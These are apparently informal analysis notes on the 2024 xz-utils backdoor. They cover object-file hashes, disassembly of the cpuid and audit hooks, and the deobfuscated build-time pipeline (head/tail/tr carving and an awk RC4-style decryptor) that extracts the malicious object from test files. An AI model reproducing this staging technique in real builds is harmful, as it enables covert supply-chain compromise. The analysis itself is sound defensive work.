this is a much more comprehensive gist, read it instead

https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

everything below is basically notes from day-of (~march 29 2024)

the openwall email i assume you've read: https://seclists.org/oss-sec/2024/q1/268

i've carved both .o out from both xz-utils 5.6.1 and 5.6.0:
		* xz-utils 5.6.1: xz-5.6.1__liblzma_la-crc64-fast.o
		    sha256: b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963
		* xz-utils 5.6.0: xz-5.6.0__liblzma_la-crc64-fast.o
		    sha256: cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537
		
in 5.6.0-0.1's liblzma.so you can find the patched _get_cpuid at 0x47f0, which is called from 0x6c24:
		6c24: e8 c7 db ff ff        callq  47f0 <__cxa_finalize@plt+0x250>
		6c29: 89 c2                 mov    %eax,%edx
		6c2b: 48 8d 05 9e fe ff ff  lea    -0x162(%rip),%rax        # 6ad0 <__cxa_finalize@plt+0x2530>
		6c32: 85 d2                 test   %edx,%edx
		6c34: 74 16                 je     6c4c <lzma_crc32@@XZ_5.0+0x5c>
		6c36: 8b 55 e8              mov    -0x18(%rbp),%edx
		6c39: f7 d2                 not    %edx
		6c3b: 81 e2 02 02 08 00     and    $0x80202,%edx      ; -- this is the cpuid mask from crc_x86_clmul.h
		
the mask 0x80202 comes from
			const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
		
but from here i can't see anything related to rtdl? i've missed some relevant details. the hardware watchpoint Andres mentioned is a good idea! with that approach i found that _rtld_global_ro._dl_naudit is set in the movl $0x1,(%rax) at 240f7 in 5.6.0-0.1 liblzma.so. this corresponds with the mov at 0x1661 in liblzma_la-crc64-fast.o.
watching for when the _dl_naudit is set back to 0, i see that the function used to hook RSA_public_decrypt is present at address 0x16a90 in liblzma.so, or the label .Llzma_index_prealloc.o in liblzma_la-crc64-fast.o mentioned at the end that page is the attachment "liblzma_la-crc64-fast.o.gz", this liblzma_la-crc64-fast.o is from xz-utils 5.6.0.

for reference, the Debian snapshots of xz-utils source are available at snapshots.debian.org:
	* 5.6.0: https://snapshot.debian.org/package/xz-utils/5.6.0-0.1/
	* 5.6.1: https://snapshot.debian.org/package/xz-utils/5.6.1-1/
		
the email's formatting mangled \t into spaces, but the quoted additional Makefile comments are reproducible. from the email:
	am__test = bad-3-corrupt_lzma2.xz
	...
	am__test_dir=$(top_srcdir)/tests/files/$(am__test)
	...
	# am__dist_setup not mentioned in the email but it's something like...
	# tr "\t \-_" " \t_\-" | xz -d
	sed rpath $(am__test_dir) | $(am__dist_setup) 2>/dev/null
	
marginally interesting, the script here varies in a few places between 5.6.0 and 5.6.1. relevant snippet, slightly cleaned up and line-wrapped:
		export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
		(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
		head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
		(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
		head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
		(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
		head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +724)"
		(xz -dc ./tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr
		"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc
	
in 5.6.1 the last "head" command is head -c +939, "tail" is tail -c +31233, and "tr"'s translation is tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377". the general idea is the same.

in both cases this yields a script like this:
	p="good-large_compressed.lzma"
	if true; then
	N=0
	W=88792
	else
	N=88792
	W=0
	fi
	xz -dc ./tests/files/$p | \
		eval $i `# from above` | \
		LC_ALL=C sed "s/\(.\)/\1\n/g" | \
		LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){\
			t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){\
			i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];\
			i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | \
		xz -dc --single-stream | \
		((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
	
that carves bits out of good-large_compressed.lzma, the only difference between 5.6.0 and 5.6.1 being if it produces an 88792 or 88664 byte .o file.